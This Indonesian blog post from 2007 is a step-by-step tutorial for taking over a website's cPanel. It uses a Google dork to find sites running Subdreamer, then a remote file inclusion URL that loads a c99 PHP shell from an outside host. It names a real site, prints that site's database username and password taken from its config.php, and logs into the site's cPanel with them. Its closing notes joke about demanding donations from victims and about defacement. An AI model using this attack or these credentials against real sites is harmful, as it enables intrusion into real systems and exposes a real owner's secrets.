By cyberlog
Published: October 2, 2007
Print
Email
Oiit ketemu lagi , jelang buka puasa di kerjaan iseng-iseng buat
artikel tentang hacking cpanel dengan memakai script injeksi c99, coz
sekedar refresh uda married susah Online [ 1 x seminggu , 2 jam ]. btw
pertanyaannya apakah Cpanel itu ? yups Cpanel adalah merupakan pusat
dari manajemen web site, CPanel atau istilah kerennya Control Panel
adalah tempat dimana admin web untuk melakukan setting penuh dan
control terhadap web yang akan dibuat atau istilahnya adalah CPANEL =
Rumah yang masih kosong yang belum ada apa-apanya, nah disanalah nanti
akan diisi perabotan-perabotan untuk melengkapi isi rumah tersebut,
Cpanel sama juga seperti rumah, dan perabotannya bisa dikategorikan
sebagai script web, script mail, script MySql, dll. Apakah CPANEL itu
begitu penting dan berharga ? yups pertanyaan yang bagus jawabannya
adalah IYA, karena bila CPANEL dalam suatu Web bisa dimasuki oleh para
hacker maka dapat dipastikan bahwa web target berada dalam control sang
hacker [ maaf saya bukan hacker J ] atau bila dilogikakan sama saja
bila rumah kita berhasil di kuasain orang lain maka dipastikan orang
lain tersebut bisa masuk kapan saja terhadap rumah kita. tapi apakah
mudah rumah kita orang lain bisa masuk kerumah kita sedangkan rumah
kita ada pengaman yaitu KUNCI, yups sama saja dengan CPANEL tidak
semudah yang kita bayangkan karena untuk masuk ke area CPANEL
membutuhkan kunci yaitu Username dan password, bila tidak maka anda
dipastikan tidak akan bisa masuk ke dalam area CPANEL tersebut. Cukup
jelas logika kita untuk berpikir , so sekarang kembali lagi ke pokok
permasalahannya, penulis akan menerangkan pengambilan alih cpanel
terhadap web target memakai kesalahan dari script logika pemograman dan
kesalahan dari admin web tersebut, J btw kita mulai penulis akan ambil suatu bug yang ada di script php dengan merk ‘subdreamer’ [ bisa diliat di www.subdreamer.com
], bug yang ada adalah : /skins/advanced/advanced2.php?pluginpath[0]=
dengan file yang bermasalah adalah advanced2.php, kita akan coba cari
target dengan memakai paman google.com dengan syntax : inurl:’
skins/advanced/advanced1.php?’, penulis ambil contoh situs luar negeri
[ sebelumnya sudah member tahukan bug ke mail mereka sesuai dengan
etika hacker ] J yaitu : http://www.cafesjakie.nl Kita coba lakukan penetrasi terhadap situs target, dengan memakai phpshell maka akan didapat hasil : http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= http://ernigalak.t35.com/mama.txt? Maka akan Nampak hasil seperti dibawah ini :
 Ok’s
kita berhasil masuk lewat belakang [ backdoor ] tetapi kita belum
mendapat akses utama [ cpanel ] hanya bisa masuk lewat pintu belakang,
so kita coba cari dimana letak akses utama [ cpanel ], perhatikan satu
persatu file yang ada, kita bisa liat di atas file phpshell kita 
Bahwa
target berada di posisi safe-mode : OFF, dan disana kita bisa liat
uid:65534(nobody), gid=65534(nobody), groups=65534(nobody) dengan user
: gbremmer, good awal yang bagus untuk kita coba cari akses cpanel pada
web target tersebut [bila belum mengerti akan uid,gid,groups bisa
mempelajari OS berbasis open Source seperti LInUX, I love linux ],
lanjut perhatikan di atas disana ada file
/home/gremmer/public_html/skins/advanced, kita akan coba mendapatkan
akses cpanel coba masuk ke halaman utama web target tersebut , klik
folder public_html atau bila anda seorang admin web ,folder public_html
= www , maka akan didapat hasil di bawah ini : 
Perhatikan
dengan seksama folder-folder tersebut, kita akan berpikir secara logika
bahwa untuk menghubungkan database memerlukan suatu username dan
password, biasanya letak keduanya berada dalam file config.php,
configuration.php, koneksi.php [ tergantung dari pembuat script
tersebut ], penulis coba kita akan klik folder includes [ biasanya
secara default letak config.php di script subdreamer ada di dalam
folder includes], maka akan didapat hasil :  Perhatikan
disana ada 2 file yaitu config.php dan config.php.new, btw kita bisa
liat ke-2 nya, hanya ada perbedaannya yaitu masalah byte –nya [
kemungkinan config.php.new hanya untuk update saja ], klik config.php
maka akan didapat hasil : 
Blah
perhatikan lagi didalam file config.php kita bisa melihat databse user
lengkap dengan passwornya , Cuma disini kita tidak akan masuk ke dalam
database tersebut karena kita akan mencoba mendapatkan akses utama
yaitu cpanel web target, perhatikan dengan seksama di $dbname =
gbremmer_subdreamer $dbusername = gbremmer_subdrea, so secara
logika gbremmer adalah nama dari user tersebut dan dibelakangnya adalah
default nama dari hosting tersebut, dan perhatikan sekali lagi file
$dbpassword = hiervomgb, merupakan dari password user tersebut untuk
masuk kedalam database web target, stop, pertanyaannya apakah kita bisa
masuk ke cpanel target tersebut ? pertanyaan yang bagus, disini penulis
akan mengajak anda berpikir secara logika, pernahkah anda merasa aman
untuk melakukan aktivitas di dunia maya [ internet ]? Untuk orang awam
mungkin ini adalah pertanyaan yang bodoh, mungkin orang akan berpikir
akan aman dan nyaman untuk urusan dunia internet [ hampir 80 % yang
mengatakan demikian, sehingga untuk urusan password hanya satu password
untuk banyak keperluan ] J, karena kita berpikiran begitu maka
disinilah letak kesalahan dari kita sendiri [ tidak pernah mau tahu
untuk urusan keamanan dalam internet ], so kembali ke akar
permasalahannya, kita akan berpikir terbalik dari kebanyakan orang awam
, kita akan coba memakai user name : gbremmer dan password : hiervomgb
untuk mendapatkan akses utama dari cpanel target tersebut. Mari kita buka URL : http://www.cafesjakie.nl/cpanel, liat halaman cpanel terproteksi oleh user name dan password , 
Bingung kan ? J, kita akan coba memasukkan username dan password yang kita dapat dari file config.php 
Blar
liatlah kita dapat memasuki cpanel target tersebut, dapat secara full
melakukan control terhadapa admin tersebut hanya dengan bermodalkan
logika tanpa harus susah payah J karena memakai kesalahan dari logika
script pemograman dan dari admin tersebut [padahal penulis juga salah
satu admin web di www.sekuritionline.net ] 
Note : -
Belajar menjadi hacker adalah sesuatu yang menyenangkan yang susah
adalah etika –nya- - Bila berhasil memasuki web target usahakan untuk
memberi tahukan ke pihak yang terkait agar dapat dilakukan patch
terhadap web tersebut [ sekalian minta donasi via e-gold ] J xixixixiix - Jadikan hacking is art jangan merusak [ kecuali kalo kepepet ]J just kidding J -
Tanamkan ke diri kita sendiri bahwa untuk urusan dunia maya ga menjamin
pure 100% aman, xixi jadi inget semboyan S-O team [ Nothing Secure in
The world or Di dunia ini tidak ada yang aman or di atas langit masih
ada langit ]J - Jadikan pembelajaran untuk admin web bila kena
webnya kena Deface ga usah lapor ke pihak berwenang [ ntar malah
ngeluarin duit banyak JJJ - Untuk admin selalu lakukan update patch
secara otomatis atau manual, serta lakukan backup data web secara
teraturJ ] seharusnya kita berterima kasih bahwa web kita diingatkan
oleh para hacker tersebut, [ bukannya marah – marah dan ngomong di TV
–TV ] bahwa web yang harganya diatas 200 juta bisa dikatakan aman [
penulis juga admin web loh ntar pada protes ] Greatz
: Allah yang member Hidup dan Matiku, My heart Erniku sayang [ uda
resmi jadi istri ] moga cepat sembuh mau punya momongan neh gue J,
rekan-rekan di S-O te@m, Bajingan Crew, adhietslank, thesims, Ngarang,
Jayoes, a-tech, jantap, babypunk, letjen, k1n9kong, setiawan,
kompor^meleduk,kabrut, saleho [ rahmad soleh ], pomponk
,blindboy,dave,sonix, ariee,tommy^pengamen, Orgil, Hilda^inside, Rini,
or yang ga bisa disebutkan satu persatu [ makasih semua yang ikut
digaht S-O di puncak ], all underground people, channel Hacker,
Cracker, Carder, yang ada di Dalnet, mildnet, realunix, thanks atas
pembelajarannya J No Greatz : Para KKN yang membuat bangsa kita menderita. Penulis bukan hacker hanya senang / hobby untuk urusan dunia underground J
View Comments (1)
|
donasi via e-gold < dudutsss dasar kwkwkw